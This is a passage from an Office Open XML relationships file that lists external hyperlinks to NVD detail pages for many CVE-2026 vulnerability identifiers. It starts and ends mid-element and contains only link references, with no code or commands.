Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81988" TargetMode="External" Id="rId664" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81989" TargetMode="External" Id="rId665" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81990" TargetMode="External" Id="rId666" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81992" TargetMode="External" Id="rId667" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82005" TargetMode="External" Id="rId668" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82006" TargetMode="External" Id="rId669" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82007" TargetMode="External" Id="rId670" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83498" TargetMode="External" Id="rId671" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83942" TargetMode="External" Id="rId672" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83952" TargetMode="External" Id="rId673" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83954" TargetMode="External" Id="rId674" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83955" TargetMode="External" Id="rId675" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83967" TargetMode="External" Id="rId676" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83968" TargetMode="External" Id="rId677" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83969" TargetMode="External" Id="rId678" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83970" TargetMode="External" Id="rId679" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83971" TargetMode="External" Id="rId680" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83972" TargetMode="External" Id="rId681" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83973" TargetMode="External" Id="rId682" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83974" TargetMode="External" Id="rId683" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83975" TargetMode="External" Id="rId684" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83976" TargetMode="External" Id="rId685" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83977" TargetMode="External" Id="rId686" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83978" TargetMode="External" Id="rId687" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83979" TargetMode="External" Id="rId688" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83980" TargetMode="External" Id="rId689" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83981" TargetMode="External" Id="rId690" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83982" TargetMode="External" Id="rId691" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83983" TargetMode="External" Id="rId692" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83985" TargetMode="External" Id="rId693" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83986" TargetMode="External" Id="rId694" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83987" TargetMode="External" Id="rId695" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83988" TargetMode="External" Id="rId696" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83990" TargetMode="External" Id="rId697" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83995" TargetMode="External" Id="rId698" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84000" TargetMode="External" Id="rId699" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85983" TargetMode="External" Id="rId700" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9034" TargetMode="External" Id="rId701" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19397" TargetMode="External" Id="rId702" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66767" TargetMode="External" Id="rId703" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69683" TargetMode="External" Id="rId704" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73315" TargetMode="External" Id="rId705" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77909" TargetMode="External" Id="rId706" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78623" TargetMode="External" Id="rId707" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82537" TargetMode="External" Id="rId708" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9040" TargetMode="External" Id="rId709" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77110" TargetMode="External" Id="rId710" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82053" TargetMode="External" Id="rId711" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86073" TargetMode="External" Id="rId712" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0860" TargetMode="External" Id="rId713" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16025" TargetMode="External" Id="rId714" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16037" TargetMode="External" Id="rId715" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16497" TargetMode="External" Id="rId716" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28604" TargetMode="External" Id="rId717" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-3174" TargetMode="External" Id="rId718" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47625" TargetMode="External" Id="rId719" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48888" TargetMode="External" Id="rId720" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57098" TargetMode="External" Id="rId721" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57099" TargetMode="External" Id="rId722" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62759" TargetMode="External" Id="rId723" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62813" TargetMode="External" Id="rId724" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66304" TargetMode="External" Id="rId725" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66307" TargetMode="External" Id="rId726" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67376" TargetMode="External" Id="rId727" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68887" TargetMode="External" Id="rId728" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69329" TargetMode="External" Id="rId729" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69342" TargetMode="External" Id="rId730" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69378" TargetMode="External" Id="rId731" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69397" TargetMode="External" Id="rId732" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69428" TargetMode="External" Id="rId733" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69429" TargetMode="External" Id="rId734" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69443" TargetMode="External" Id="rId735" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69514" TargetMode="External" Id="rId736" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69539" TargetMode="External" Id="rId737" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69587" TargetMode="External" Id="rId738" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69588" TargetMode="External" Id="rId739" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69599" TargetMode="External" Id="rId740" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69607" TargetMode="External" Id="rId741" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69631" TargetMode="External" Id="rId742" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69710" TargetMode="External" Id="rId743" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69739" TargetMode="External" Id="rId744" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69744" TargetMode="External" Id="rId745" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69760" TargetMode="External" Id="rId746" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69793" TargetMode="External" Id="rId747" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69803" TargetMode="External" Id="rId748" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69804" TargetMode="External" Id="rId749" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69805" TargetMode="External" Id="rId750" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69809" TargetMode="External" Id="rId751" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69852" TargetMode="External" Id="rId752" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69881" TargetMode="External" Id="rId753" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69890" TargetMode="External" Id="rId754" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69929" TargetMode="External" Id="rId755" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69930" TargetMode="External" Id="rId756" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70065" TargetMode="External" Id="rId757" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70124" TargetMode="External" Id="rId758" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70570" TargetMode="External" Id="rId759" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70579" TargetMode="External" Id="rId760" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70587" TargetMode="External" Id="rId761" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71330" TargetMode="External" Id="rId762" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72923" TargetMode="External" Id="rId763" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72928" TargetMode="External" Id="rId764" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72932" TargetMode="External" Id="rId765" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72943" TargetMode="External" Id="rId766" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72949" TargetMode="External" Id="rId767" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72954" TargetMode="External" Id="rId768" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72989" TargetMode="External" Id="rId769" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73017" TargetMode="External" Id="rId770" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75998" TargetMode="External" Id="rId771" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77101" TargetMode="External" Id="rId772" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77102" TargetMode="External" Id="rId773" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77103" TargetMode="External" Id="rId774" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77104" TargetMode="External" Id="rId775" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77108" TargetMode="External" Id="rId776" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77494" TargetMode="External" Id="rId777" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77498" TargetMode="External" Id="rId778" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77499" TargetMode="External" Id="rId779" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77501" TargetMode="External" Id="rId780" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77502" TargetMode="External" Id="rId781" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77886" TargetMode="External" Id="rId782" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77888" TargetMode="External" Id="rId783" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77889" TargetMode="External" Id="rId784" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77890" TargetMode="External" Id="rId785" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77893" TargetMode="External" Id="rId786" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77895" TargetMode="External" Id="rId787" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77898" TargetMode="External" Id="rId788" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78523" TargetMode="External" Id="rId789" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78574" TargetMode="External" Id="rId790" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78837" TargetMode="External" Id="rId791" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79377" TargetMode="External" Id="rId792" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79378" TargetMode="External" Id="rId793" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79572" TargetMode="External" Id="rId794" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79575" TargetMode="External" Id="rId795" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81355" TargetMode="External" Id="rId796" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81381" TargetMode="External" Id="rId797" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81790" TargetMode="External" Id="rId798" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83989" TargetMode="External" Id="rId799" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84001" TargetMode="External" Id="rId800" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85400" TargetMode="External" Id="rId801" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86075" TargetMode="External" Id="rId802" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86711" TargetMode="External" Id="rId803" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86721" TargetMode="External" Id="rId804" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86728" TargetMode="External" Id="rId805" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19651" TargetMode="External" Id="rId806" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69347" TargetMode="External" Id="rId807" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71375" TargetMode="External" Id="rId808" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76196" TargetMode="External" Id="rId809" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78461" TargetMode="External" Id="rId810" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81383" TargetMode="External" Id="rId811" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84003" TargetMode="External" Id="rId812" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28613" TargetMode="External" Id="rId813" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28626" TargetMode="External" Id="rId814" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28656" TargetMode="External" Id="rId815" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45528" TargetMode="External" Id="rId816" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69477" TargetMode="External" Id="rId817" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78627" TargetMode="External" Id="rId818" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86806" TargetMode="External" Id="rId819" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76561" TargetMode="External" Id="rId820" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81349" TargetMode="External" Id="rId821" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81806" TargetMode="External" Id="rId822" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82061" TargetMode="External" Id="rId823" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82071" TargetMode="External" Id="rId824" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84387" TargetMode="External" Id="rId825" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86733" TargetMode="External" Id="rId826" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-11573" TargetMode="External" Id="rId827" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16769" TargetMode="External" Id="rId828" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20293" TargetMode="External" Id="rId829" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 